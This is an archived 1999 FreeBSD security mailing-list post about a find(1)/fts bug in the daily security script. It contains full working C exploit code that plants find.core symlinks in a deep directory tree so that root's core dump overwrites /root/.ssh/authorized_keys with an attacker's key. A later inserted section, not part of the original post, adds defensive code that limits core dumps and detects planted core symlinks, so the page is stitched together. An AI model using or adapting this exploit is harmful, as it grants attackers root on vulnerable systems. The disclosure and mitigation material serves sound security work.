FW: RE: fts_print() , find and other stuff ?

From: Przemyslaw Frasunek (venglinat_private)
Date: Wed Aug 25 1999 - 00:13:18 PDT

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    - -----FW: <XFMail.990825091318.venglinat_private>-----
    
    Date: Wed, 25 Aug 1999 09:13:18 +0200 (CEST)
    Sender: owner-freebsd-securityat_private
    From: Przemyslaw Frasunek <venglinat_private>
    To: Rafal Banaszkiewicz <raf@tb-303.org>
    Subject: RE: fts_print() , find and other stuff ?
    Cc: freebsd-securityat_private
    
    On 24-Aug-99 Rafal Banaszkiewicz wrote:
    
    >       One of my friends has written sploit code for this bug? It's an old
    > bug... and it's still not fixed.
    
     Yes, this bug is quite easy to exploit. Find(1) runs every day from the
     /etc/security script. It segfaults when the directory tree is _very_ long, because
     of a junk pointer to the directory name.
    
     A core is created in one of the directories from our tree. But if find.core already
     exists, it's overwritten. It's possible to create a symlink from e.g.
     master.passwd or something else to find.core, and this file will be
     overwritten.
    
     Sample code below.
    
     BTW. Sorry for my poor English.
    
    /*
    
     (c) 1999 babcia padlina ltd. <babuniaat_private>
    
     a bug in the fts libc functions allows overwriting any file in the system when
     running the /etc/security script (executed from the 'daily' scripts).
    
     affected systems:
       - freebsd (all versions)
       - probably openbsd/netbsd
    
     fix:
       - limit root's coredump size
       - patch libc
    
    */
    
    #include <stdio.h>
    #include <errno.h>
    #include <sys/stat.h>
    #include <strings.h>    /* bzero() */
    #include <string.h>     /* memset() */
    #include <unistd.h>
    
    #define STRING          "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n"
    #define FILE            "/root/.ssh/authorized_keys"
    #define CORE            "find.core"
    #define DEPTH           300
    #define BUFSIZE         250
    
    int makedir(char *dir, char *linkfrom, char *linkto)
    {
    
            if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
                    return -1;
    
            if (chdir(dir))
                    return -1;
    
            if (symlink(linkfrom, linkto) < 0)
                    return -1;
    
            return 0;
    }
    
    
    int main(void)
    {
            int i = 0;
            char pid[10], buf[BUFSIZE];
    
            sprintf(pid, "%d", getpid());
    
            if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO)))
            {
                    perror("mkdir()");
                    return -1;
            }
    
            if (chdir(pid))
            {
                    perror("chdir()");
                    return -1;
            }
    
            bzero(buf, BUFSIZE);
            memset(buf, 0x41, BUFSIZE-1);
    
            for(i=0;i<DEPTH;i++)
            {
                    if (makedir(STRING, FILE, CORE) < 0)
                    {
                            perror("makedir()");
                            return -1;
                    }
    
                    if(makedir(buf, FILE, CORE) < 0)
                    {
                            perror("makedir()");
                            return -1;
                    }
            }
    
            return 0;
    }
    
    - --------------End of forwarded message-------------------------
    
    - ---
    * Fido: 2:480/124 ** WWW: FreeBSD.lublin.pl/~venglin ** GSM: +48-601-383657 *
    * Inet: venglinat_private ** PGP: D48684904685DF43 EA93AFA13BE170BF *
    
    -----BEGIN PGP SIGNATURE-----
    Version: PGPfreeware 5.0i for non-commercial use
    Charset: noconv
    
    iQA/AwUBN8OcA/6SPyHAYTvjEQLrywCfd5hMX9Cak+W1SuW7o4oA4o/RUPoAoJDC
    8PVlnVtNw9p7rTmtBtTL3uC4
    =P88V
    -----END PGP SIGNATURE-----
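The two fixes listed in the post ("limit root's coredump size" and patching libc) suggest what a defender can do on the job-runner side. The following is an added example, not code from the original post or from FreeBSD: it implements the first fix with `setrlimit(RLIMIT_CORE)` so that a crash in a periodic job cannot produce a core file at all, and adds a small check that flags a `*.core` directory entry that is a symlink to an absolute or `..`-climbing target, the planted-link pattern described above. The function names, the `.core` suffix heuristic and the `corecheck` program name are assumptions of this example.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/resource.h>

/* Mitigation (the post's "limit root's coredump size"): set both the soft
 * and hard RLIMIT_CORE to 0 in the job runner, so neither find(1) nor any
 * other child of the periodic script can leave a core file, and a planted
 * find.core symlink has nothing to redirect.
 * Returns 0 on success, -1 on error (errno set by setrlimit). */
int disable_core_dumps(void)
{
        struct rlimit rl;

        rl.rlim_cur = 0;
        rl.rlim_max = 0;        /* hard limit too, so a child cannot raise it */
        return setrlimit(RLIMIT_CORE, &rl);
}

/* Reads back the soft core-dump limit; (rlim_t)-1 on error. */
rlim_t core_dump_limit(void)
{
        struct rlimit rl;

        if (getrlimit(RLIMIT_CORE, &rl) != 0)
                return (rlim_t)-1;
        return rl.rlim_cur;
}

/* Detection: does a directory entry named like a core file (*.core) look
 * like a planted link? The heuristic (an assumption of this example) flags
 * a symlink whose target is absolute or climbs with "..", since a core
 * written through it would land outside the tree being walked.
 * Returns 1 if suspicious, 0 if not, -1 if the path cannot be inspected. */
int core_symlink_is_suspicious(const char *path)
{
        struct stat st;
        char target[4096];
        ssize_t len;
        const char *base = strrchr(path, '/');
        size_t n;

        base = base ? base + 1 : path;
        n = strlen(base);
        if (n < 5 || strcmp(base + n - 5, ".core") != 0)
                return 0;               /* not named like a core file */
        if (lstat(path, &st) != 0)
                return -1;
        if (!S_ISLNK(st.st_mode))
                return 0;               /* a regular file, not a planted link */
        len = readlink(path, target, sizeof target - 1);
        if (len < 0)
                return -1;
        target[len] = '\0';
        return (target[0] == '/' || strstr(target, "..") != NULL) ? 1 : 0;
}

/* Usage: ./corecheck [path ...]   (hypothetical program name) */
int main(int argc, char **argv)
{
        int i;

        if (disable_core_dumps() != 0) {
                perror("setrlimit(RLIMIT_CORE)");
                return 1;
        }
        printf("core dump limit now %lu bytes\n",
               (unsigned long)core_dump_limit());

        for (i = 1; i < argc; i++) {
                int r = core_symlink_is_suspicious(argv[i]);
                printf("%s: %s\n", argv[i],
                       r == 1 ? "SUSPICIOUS core symlink" :
                       r == 0 ? "ok" : "cannot inspect");
        }
        return 0;
}
```

Calling `disable_core_dumps()` early in the script runner (before it execs `find` or any other tool) is the cheap fix; the limit is inherited across `fork`/`exec`, and because the hard limit is also 0 a child cannot raise it again. The symlink check is only a heuristic for auditing trees that untrusted users can write to; the real fix remains patching the fts routines so that `find` does not crash on a deep tree.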
    
    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:59:26 PDT